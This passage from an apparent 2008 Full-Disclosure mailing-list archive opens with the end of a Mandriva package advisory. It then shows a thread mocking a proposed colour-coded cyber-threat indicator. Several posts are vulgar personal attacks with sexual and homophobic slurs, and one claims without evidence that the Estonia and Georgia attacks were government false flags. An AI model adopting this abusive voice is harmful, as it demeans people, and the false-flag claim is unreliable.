9b2bc33430ac70a2c24eab9f2afee0c2 corporate/4.0/i586/libsamplerate-progs-0.1.2-1.1.20060mlcs4.i586.rpm 83cdd1d3349f1017c4c92cb6ee0fb636 corporate/4.0/SRPMS/libsamplerate-0.1.2-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: ffbc6a9d6d3403a52ca5cbe3c4a3495d corporate/4.0/x86_64/lib64samplerate0-0.1.2-1.1.20060mlcs4.x86_64.rpm 991dd38ed664577613f6a55da77eaa29 corporate/4.0/x86_64/lib64samplerate0-devel-0.1.2-1.1.20060mlcs4.x86_64.rpm 92d88adbf9d580a772b702f33cf8d027 corporate/4.0/x86_64/libsamplerate-progs-0.1.2-1.1.20060mlcs4.x86_64.rpm 83cdd1d3349f1017c4c92cb6ee0fb636 corporate/4.0/SRPMS/libsamplerate-0.1.2-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJOFc0mqjQ0CJFipgRAjweAKDVUt2pCqRSgKnXlJI0gJoSgbuXBACeMk6+ SxoIyNyLtbDX6XnTUTazqts= =Kbrk -----END PGP SIGNATURE----- From ureleet at gmail.com Fri Dec 5 01:30:35 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:30:35 -0500 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> Message-ID: <6158bb410812041730o2944f168ubc4b4535520ef25@mail.gmail.com> true. On Wed, Dec 3, 2008 at 10:23 PM, ghost wrote: > Hey mike, how about you stop playing moderator you fucking douche bag. > I for one believe netdev brings alot to this list and encourage him > and ureleet to continue posting. > > On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: >> Hye Guys, >> >> I though we had settled the issues offline. Lets restart our >> discussions.. this bickering is highly unnecessary on the list. >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Fri Dec 5 01:31:31 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:31:31 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <20081202192922.62A6C118041@smtp.hushmail.com> Message-ID: <6158bb410812041731l3aced389ra38603f0d118870@mail.gmail.com> u mean, again? dude, its already been done. and by ppl alot smarter than u. stfu. try sumthing knew. u obviously fucked this 1 up. On Wed, Dec 3, 2008 at 9:45 PM, Mike C wrote: > On Tue, Dec 2, 2008 at 11:29 AM, Elazar Broad wrote: >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> >> >> On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad >> wrote: >>>Mike C wrote: >>>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad >>>wrote: >>>> >>>>> and how does making a color based on these inputs protect >>>people? >>>>> >>>>> >>>> >>>> Once all desktops have an icon or widget (say at the right hand >>>> corner) with the color, and this is consistently seen >>>everywhere, the >>>> users will start associating with their online security. they >>>will be >>>> reminded that they have to be careful with the data they share. >>>> >>>> This, if implemented correctly will be a boon to security >>>industry, >>>> where the weakest kinks currently are 'n00b' users. >>>> >>>> >>>you are joking right? >>> >>>So some widget is going to stop the next SMB remote or IE client >>>side >>>and protect the 'n00b' users? Please explain how this works. Also >>>please >>>explain how "they will be reminded that they have to be careful >>>with the >>>data they share. " has anything to do with protecting a users >>>machine >>>from being compromised. >> >> Thats the whole point. There is a fine line between using visual >> alerts to put people(Joe six pack) into a state of "awareness"(more >> like mild hysteria) of a threat versus knowing how to protect >> oneself against that threat and using that awareness indicator as >> the kick in the ass to get moving and shore up the defenses(hell, >> how many security folk do this too, then again, every time >> something goes bump we see red). Visual alerts are great at >> persuasion tools, especially when the goal is to get Joe to buy >> your latest all-in-one-will-make-your-coffee-and-buy-you-beer >> AV/Malware/Spyware/Foo(whats this doing here?)/evil monkey in the >> closet package. So of course, Joe will never learn how to properly >> defend his computer/data, and the "industry" will prosper. >> > > I dont think it is a lost battle. This method could prove an excellent > way to solve this age old problem. > >> Now, thanks to our good friends over at the DHS, the color system >> has turned into a complete and utter joke(for the most part), so my >> friend, you see, this a complete exercise in futility(besides the >> fact that every friggin AV/IDS/Security/SIM company out there has >> red, yellow and green as their corporate "flag", if you are just >> joining the party, then you can completely ignore this) >> > DHS implementation leaves a lot to be desired. Please do not compare > this to DHS's implementation. > >> If you really want to change state of security for the n00bs, >> spread the knowledge, not the colors. >> > Thats what project Chroma is all about.. Are you on board?! > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Fri Dec 5 01:32:20 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:32:20 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <4b6ee9310812041429y40f606bcq837c44e829a11948@mail.gmail.com> References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net> <2d792fb20812040836r7746afdahf5ab892579069878@mail.gmail.com> <4b6ee9310812041429y40f606bcq837c44e829a11948@mail.gmail.com> Message-ID: <6158bb410812041732u26c8cfebs98b98b0634304c23@mail.gmail.com> you know andrew, i couldnt have said it better. even tho i disagree and _do_ say that estonia and georgia _were_ cyber attacks, u make an excellent discussion. On Thu, Dec 4, 2008 at 5:29 PM, n3td3v wrote: > On Thu, Dec 4, 2008 at 4:36 PM, Razi Shaban wrote: >> On Thu, Dec 4, 2008 at 5:03 PM, Chris Jeane wrote: >>> The Project Chroma Project website reads(I have highlighted the colors in >>> black so that they are readable): >>> >>> Levels crap >>> >> >> On Thu, Dec 4, 2008 at 6:28 PM, Razi Shaban wrote: >>> On Thu, Dec 4, 2008 at 6:02 PM, Chris Jeane wrote: >>>> Exactly. Which is why there is a need of a system that contains more >>>> information and less cookie cutter levels. We still don't know what a >>>> cyber-war looks like. One country could attack the transport/power systems >>>> of a third party that supplies/supports their target. This is all >>>> hypothetical, but there is a high probability of collateral damage. >>>> >>> >>> You misunderstood me. What I was getting at is that your ideas, >>> including a "cyber-war" and all this leveling, show that you are about >>> as uninformed as n3td3v. Please take your nub spam somewhere else. >>> >>> -- >>> Razi Shaban >>> >> >> To explain the idea of leveling: The internet is a gigantic place. No >> matter when and from where you connect, it is out to get you, you >> individually. Also, large-scale cyber wars are a constant thing. I am >> aware of three very large-scale wars taking place at the moment, does >> that increase or decrease the risk any user would be taking by >> accessing the internet? Of course not. The concept of basing a >> levelling system on a few organized national or private attempts to do >> something or another is ridiculous; the Estonian attack compromised >> less than 0.0001% of all cyber attacks during that time period. >> >> The matter of the fact is, attempting to take the hugely complex and >> intricate dark side of the internet and summarize it in a color level >> is absurd. In fact, attempting to summarize it at all is ridiculous. >> Summarizing implies that you know everything about the topic. Anyone >> trying to summarize this knows nothing when he/she realizes the >> vastness of the internet. >> >> tl;dr : attempting to summarize the internet is less fruitful than >> throwing ice cubes at the sun, but it requires much lesser >> intelligence to do the first. >> > > I can't believe people are still using Estonia as an example of a > cyber attack, it was a false flag on an epic scale and so obvious to > I.T security experts. The government have got to try harder if they > want to convince the industry that cyber terrorism is a real threat. > But the fact is Estonia and Georgia just weren't convincing enough at > least for me, I don't know what others think. > > And the shutting down of a turbine and posting the video to CNN was > just a joke, there was no actual evidence of how the turbine shut > down, it could just be a man in the corner flicking a switch, there > was no evidence of someone using a computer to shut it down, we were > told it was a cyber attack doing it, but no proof or evidence was > given to prove it. They didn't even have a guy with a laptop standing > beside it or anything like that, really the government are clueless > with it comes to cyber security and creating a convincing false flag. > > When it comes to power stations being shut down through computerised > attack, I don't see the threat coming from cyber terrorism, what I see > the threat is more is accidental infection, like the three hospitals > in London that got shut down last month because of the MyTob worm/ > virus, the industry sit up and listen to that kind of thing and take > it seriously (or at least I did), but they shouldn't take seriously > Estonia, Georgia, DHS turbine videos. > > Cyber terrorism isn't a real threat in the climate we're in right now, > what we should fear is accidental infection like the three hospitals > in London. That got my attention more than Estonia, Georgia, DHS > turbine video put together, because it was so obvious that the three > hospitals in London was a genuine incident and not set up by the > powers of be. > > We should worry more about staff competence being the main threat, not > cyber terrorism, but mistakes made by I.T departments and accidental > infection onto networks that are sensitive like the three hospitals in > London. > > Please it just makes me cringe when I see people using Estonia as a > way to pave political policy and setting up things. There is no cyber > terrorism guys, there is staff incompetence and accidental infection > that is the biggest worry for me right now, than some people in a cave > wanting to carry out an electronic jihad. > > Money is wasted setting up cyber commands and other stuff, the money > should really be spent on making sure the private and public sector > and academia is trained to a specific standard so that the three > hospitals incident can't happen again. > > As for the color code thing, thats just a load of wash and bollocks > thats not needed, its good for businesses like Symantec and SANS to > have alert levels, because fear is part of what they play on to make > the money that they do. > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Fri Dec 5 01:32:56 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:32:56 -0500 Subject: [Full-disclosure] Iran executes IT expert who spied for Israel In-Reply-To: References: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com> <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com> <6158bb410812030655m3d8f88adj5a7c3f5084dad4c1@mail.gmail.com> Message-ID: <6158bb410812041732l5beee829r3cf2e4269d353606@mail.gmail.com> oh mike c, now i shall turn my wrath towards u for being a cock. On Wed, Dec 3, 2008 at 9:49 PM, Mike C wrote: > On Wed, Dec 3, 2008 at 6:55 AM, Ureleet wrote: >> hes not a troll andrew. he brings up good points. u nd i are the >> only trolls here. i only troll u. you troll every1. >> > > Yes, acceptance is he first stage of recovery for the both of you. Let > us continue with the offline discussions. > > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > From ureleet at gmail.com Fri Dec 5 01:34:08 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:34:08 -0500 Subject: [Full-disclosure] Fwd: Solving of problems In-Reply-To: <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com> References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com> <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com> Message-ID: <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com> ---------- Forwarded message ---------- From: Ureleet Date: Thu, Dec 4, 2008 at 8:34 PM Subject: Re: Solving of problems To: Mike C Cc: n3td3v who says we have it in for each other at all? what makes u the official 'problem' solver. i am the Yin to n3td3v's yang, u r just fucking up the rotation. On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote: > Ok. Lets restart. Why has the bickering restarted? > > Why do you have it in for each other? > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > From ureleet at gmail.com Fri Dec 5 01:29:57 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:29:57 -0500 Subject: [Full-disclosure] News for Ureleet In-Reply-To: References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> Message-ID: <6158bb410812041729p4e242201j9959c3df72c43061@mail.gmail.com> "we" implying, u, me, and n3td3v. 1st of all, u didnt do shit but send 2 emails. the talks between me n n3td3v have always been an open line of communication, ur just some "douche" who is obvouisly trying to take credit 4 stuff. moderate the n3td3v/ureleet discussion? yes, that was mike c, the cockswallower. o, and hes the lead of project chroma. even n3td3v said ur project is fucking pointless. go rot u cocksucker. u obviously have no contribution 2 life other than breathing my air. choke on a cock. On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: > Hye Guys, > > I though we had settled the issues offline. Lets restart our > discussions.. this bickering is highly unnecessary on the list. > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > From ghosts at gmail.com Fri Dec 5 01:38:48 2008 From: ghosts at gmail.com (ghost) Date: Thu, 4 Dec 2008 20:38:48 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <6158bb410812041731l3aced389ra38603f0d118870@mail.gmail.com> References: <20081202192922.62A6C118041@smtp.hushmail.com> <6158bb410812041731l3aced389ra38603f0d118870@mail.gmail.com> Message-ID: <6f4bb0b50812041738yec1d227n1b3d355761b50020@mail.gmail.com> A colour scheme will save the world huh? So theyll be more dangerous when its red? Wont it always be red? why not just cut out the color scheme and emboss "THE INTERNET IS DANGEROUS, SERIOUS BUSINESS!" on every monitor. It will do the exact same thing your suggesting. without taking up my screen space. > On Wed, Dec 3, 2008 at 9:45 PM, Mike C wrote: >> On Tue, Dec 2, 2008 at 11:29 AM, Elazar Broad wrote: >>> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA1 >>> >>> >>> >>> On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad >>> wrote: >>>>Mike C wrote: >>>>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad >>>>wrote: >>>>> >>>>>> and how does making a color based on these inputs protect >>>>people? >>>>>> >>>>>> >>>>> >>>>> Once all desktops have an icon or widget (say at the right hand >>>>> corner) with the color, and this is consistently seen >>>>everywhere, the >>>>> users will start associating with their online security. they >>>>will be >>>>> reminded that they have to be careful with the data they share. >>>>> >>>>> This, if implemented correctly will be a boon to security >>>>industry, >>>>> where the weakest kinks currently are 'n00b' users. >>>>> >>>>> >>>>you are joking right? >>>> >>>>So some widget is going to stop the next SMB remote or IE client >>>>side >>>>and protect the 'n00b' users? Please explain how this works. Also >>>>please >>>>explain how "they will be reminded that they have to be careful >>>>with the >>>>data they share. " has anything to do with protecting a users >>>>machine >>>>from being compromised. >>> >>> Thats the whole point. There is a fine line between using visual >>> alerts to put people(Joe six pack) into a state of "awareness"(more >>> like mild hysteria) of a threat versus knowing how to protect >>> oneself against that threat and using that awareness indicator as >>> the kick in the ass to get moving and shore up the defenses(hell, >>> how many security folk do this too, then again, every time >>> something goes bump we see red). Visual alerts are great at >>> persuasion tools, especially when the goal is to get Joe to buy >>> your latest all-in-one-will-make-your-coffee-and-buy-you-beer >>> AV/Malware/Spyware/Foo(whats this doing here?)/evil monkey in the >>> closet package. So of course, Joe will never learn how to properly >>> defend his computer/data, and the "industry" will prosper. >>> >> >> I dont think it is a lost battle. This method could prove an excellent >> way to solve this age old problem. >> >>> Now, thanks to our good friends over at the DHS, the color system >>> has turned into a complete and utter joke(for the most part), so my >>> friend, you see, this a complete exercise in futility(besides the >>> fact that every friggin AV/IDS/Security/SIM company out there has >>> red, yellow and green as their corporate "flag", if you are just >>> joining the party, then you can completely ignore this) >>> >> DHS implementation leaves a lot to be desired. Please do not compare >> this to DHS's implementation. >> >>> If you really want to change state of security for the n00bs, >>> spread the knowledge, not the colors. >>> >> Thats what project Chroma is all about.. Are you on board?! >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ghosts at gmail.com Fri Dec 5 01:53:35 2008 From: ghosts at gmail.com (ghost) Date: Thu, 4 Dec 2008 20:53:35 -0500 Subject: [Full-disclosure] Fwd: Solving of problems In-Reply-To: <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com> References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com> <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com> <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com> Message-ID: <6f4bb0b50812041753i7d9af76bh201b8b058db8c239@mail.gmail.com> FWD FUD FTW On Thu, Dec 4, 2008 at 8:34 PM, Ureleet wrote: > ---------- Forwarded message ---------- > From: Ureleet > Date: Thu, Dec 4, 2008 at 8:34 PM > Subject: Re: Solving of problems > To: Mike C > Cc: n3td3v > > > who says we have it in for each other at all? what makes u the > official 'problem' solver. i am the Yin to n3td3v's yang, u r just > fucking up the rotation. > > On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote: >> Ok. Lets restart. Why has the bickering restarted? >> >> Why do you have it in for each other? >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From vulcanius at gmail.com Fri Dec 5 02:14:48 2008 From: vulcanius at gmail.com (vulcanius) Date: Thu, 4 Dec 2008 21:14:48 -0500 Subject: [Full-disclosure] Fwd: Solving of problems In-Reply-To: <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com> References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com> <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com> <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com> Message-ID: Yin is the dark and yang is the light. Are you saying that you're the evil one Ureleet and... *gulp* ...n3td3v is the good? On Thu, Dec 4, 2008 at 8:34 PM, Ureleet